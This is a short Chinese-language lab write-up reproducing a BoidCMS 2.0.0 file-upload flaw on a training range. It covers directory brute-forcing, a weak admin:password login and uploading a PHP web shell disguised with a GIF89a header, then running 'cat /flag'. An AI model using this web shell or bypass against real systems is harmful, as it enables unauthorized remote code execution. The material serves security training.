0x01 前言
BoidCMS v.2.0.0 存在文件上传漏洞,远程攻击者可通过添加 GIF 头部绕过 MIME 类型检查,执行任意代码。
影响范围:
- BoidCMS <= 2.0.0
复现准备:
- 靶机:春秋云境 http://xxxxx.cloudeci1.ichunqiu.com
0x02 复现
1.登录后台
进入网站,没有看到登录相关内容,对该网站进行目录爆破,发现以下路径:
http://xxxxx.cloudeci1.ichunqiu.com/admin
进入登录页面:
尝试弱口令:admin:password 登录成功。
2.上传木马
找到上传文件位置:
上传木马文件内容:
GIF89a
<?php system($_GET['cmd']);phpinfo();?>
点击 view 前往文件路径,在 url 中输入参数:
http://eci-2zeebfpu72fwezconcwq.cloudeci1.ichunqiu.com/media/1.php?cmd=cat /flag
看到 flag。
免责声明
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!